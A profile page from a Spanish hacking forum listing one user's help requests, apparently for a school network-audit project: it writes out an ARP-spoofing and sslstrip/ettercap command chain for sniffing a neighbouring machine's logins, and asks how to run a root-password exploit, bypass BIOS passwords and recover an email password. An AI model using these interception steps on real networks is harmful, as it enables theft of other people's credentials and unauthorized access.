Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - gerard_88

#1
Hacking / AYUDA urgente, porfavor
27 Abril 2010, 21:33 PM
Hola compañeros, como explique en otro post, tengo que hacer un proyecto final de sintesis, y he hecho una auditoria de mi instituto, todo el tema de cableado, seguridad fisica, temperaturas etc etc etc. Añado que soy uno de los administradores, por lo cual se todos los passwords, pero claro tengo que intentar petarlos como haria un alumno, pero ya juego con algo de ventaja.
El problema lo tengo en la parte LOGICA.

Problemas:
1- Tengo que mirar de sacar el password de admin, o almenos borrarlo para acceder a la configuracion de los AP (Dlink 3200), y lo mismo para los switch, HP Procurve 1700-24. He empezado con el AP, que por otra parte nose porque pero me lo detecta como el 2100...

He estado buscando y no he encontrado ninguna vulnerabilidad explotable.
Por lo cual, lo unico que se me ocurre, es montar un sniffer y sniffar la maquina de al lado, poner user y password y me que salga. Hace tiempo, use el sslstrip+ ettercap:


arpspoof -i eth0 -t 10.13.33.X 10.13.33.106

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
sslstrip -l 1000

sudo ettercap -Tqz -i eth0


y me funciono en mi wifi, pero en el insti lo tengo que hacer en la red cableada, y lo he probado y no me da ningun resultado, ni siquiera el trafico HTTP. Le he comentado al profe de Linux el problema y me ha dicho que con esos comandos no lo conseguiria, pero posiblemente si con otros, y la verdad no tengo ni idea de cuales, es mas no se porque no funciona.
Nota, las ip's una es la de la "victima" y la otra es la del servidor que es el DNS y proxy, de alli enruta hasta un firewall (fortiguard) y de alli al router de salida. Antes de llegar al server pasa por dos Switch's, el de aula y el de planta.



2- Acceder al servidor, un dia de rebote un compi, saco el pass de root del server, es un Debian . No se actualiza desde el 2007, y hay un exploit para borrar el pass de root, la cosa es que los alumnos disponemos de permisos en ese servidor para subir archivos, entonces seria algo asi resumido:
1-ssh -l alumne 10.13.33.106
Ya estoy dentro, me dijo que debo subir el fichero, compilarlo, ejecutarlo, y entonces te pide el nuevo password de root.
COMO LO HAGO? porque la teoria parece facil pero cuando me pongo no hay manera...



3- Este punto ya no es tan importante, pero si se os ocurre algo pues no esta de mas. No hace falta que sea desde Linux.
Tenemos los pc's capados, pass de bios, arranque desde HD only, usuario sin permisos de instalacion, solo de ejecucion.
Se os ocurre alguna forma de sacar el pass, o borrarlo?

Menos el ultimo paso es imprescindible que sea en Linux. Y lo antes posible, puesto que esta semana tengo que presentar el borrador.
Muchas gracias de antemano, yo seguire indagando, a ver si se me ocurre algo.
#2
Hacking / Recuperar pass mail (dificil)
8 Febrero 2010, 23:37 PM
Hola compañeros, el otro dia recorde que tengo una cuenta de correo en ya.com que me hice cuando tenia 12 o 13 años, asi como una web que da pena y me gustaria recuperar el password para dar de baja ambas cosas.
El tema es que despues de 10 años no me acuerdo de la contraseña, y ahi estoy dandole probando passwords pero nada, y el recordar contraseña de ya.com no sirve para nada.

Habria la posibilidad de sacar la contraseña o almenos algo de informacion para intentar recordarla?
Puede parecer que quiero sacar el pass a un mail ageno pero no es asi, y lo puedo demostrar ;).
#3
Hacking / Actualizado Proyecto de Final de Curso
1 Diciembre 2009, 11:33 AM
Hola compañeros, bueno primero me presento un poco, estoy estudiando un ciclo formativo superior de Administracion de sistemas informaticos en un insti privado, este año termino el curso, y tenemos que hacer un proyecto de libre eleccion tematica.
El mio no tiene titulo aun, pero va sobre seguridad y redes. Mi trabajo se centrara en buscar posibles Vulnerabilidades del centro y acceder hasta donde pueda, sin cargarme nada ni putear a nadie ofcourse, quiero hacerlo bien ya que lo hago, y hacerlo desde fuera, por ejemplo desde mi casa, el profe de redes me ha dicho que es bastante dificil PERO NO IMPOSIBLE, sino pues como todos los dias tengo acceso a la red, pues desde alli, ir escalando. Tengo que documentar todo lo que haga, y despues decir como se podria evitar.
Vaya puntazo no que te den bandera verde para hackear el insti?
Bueno poco a poco ire poniendo mis avances y mis dudas aqui.
Un saludo
Gerard


ACUTALIZADO mirar respuesta 12
#4
Hacking / Problemas con cambio de Mac Linux
26 Noviembre 2009, 10:55 AM
Hola compañeros, he usado el buscador pero no he encontrado lo que buscaba.
Mi problema es el siguiente, estoy en un linux y quiero cambiarme la mac, hago lo siguiente:

ifconfig wlan0 down
ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX
ifconfig wlan0 up

me cambia la mac todo perfecto, pero no me puedo conectar a ninguna wifi con la nueva mac, y ninguna de ellas tiene filtro mac, he probado a poner los 6 primeros digitos que son los del fabricante originales y solo cambiar los 6 ultimos, pero tampoco, no entiendo que puede ser...
Gracias de antemano.
#5
Hacking / Problemas Sslstrip
1 Noviembre 2009, 21:11 PM
Hola compañeros, estoy haciendo mis pinitos con el sslstrip, hago los siguientes pasos:

Shell 1:
cd '/home/anonimous/Escritorio/sslstrip-0.4'
python setup.py build
python setup.py install

Shell 2:
arpspoof -i wlan0 -t 192.168.1.33 192.168.1.1

Shell 3:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
sslstrip -l 1000

Shell 4:
sudo ettercap -Tqz -i wlan0

La primera vez que lo probe me funciono, pero despues me devuelve este error, y no entiendo su significado.

Traceback (most recent call last):
 File "/usr/local/bin/sslstrip", line 256, in <module>
   main(sys.argv[1:])
 File "/usr/local/bin/sslstrip", line 246, in main
   server = ThreadingHTTPServer(('', int(listenPort)), StripProxy)
 File "/usr/lib/python2.6/SocketServer.py", line 400, in __init__
   self.server_bind()
 File "/usr/lib/python2.6/BaseHTTPServer.py", line 108, in server_bind
   SocketServer.TCPServer.server_bind(self)
 File "/usr/lib/python2.6/SocketServer.py", line 411, in server_bind
   self.socket.bind(self.server_address)
 File "<string>", line 1, in bind
socket.error: [Errno 98] Address already in use


Haber si alguien me puede ayudar.
Gracias de antemano.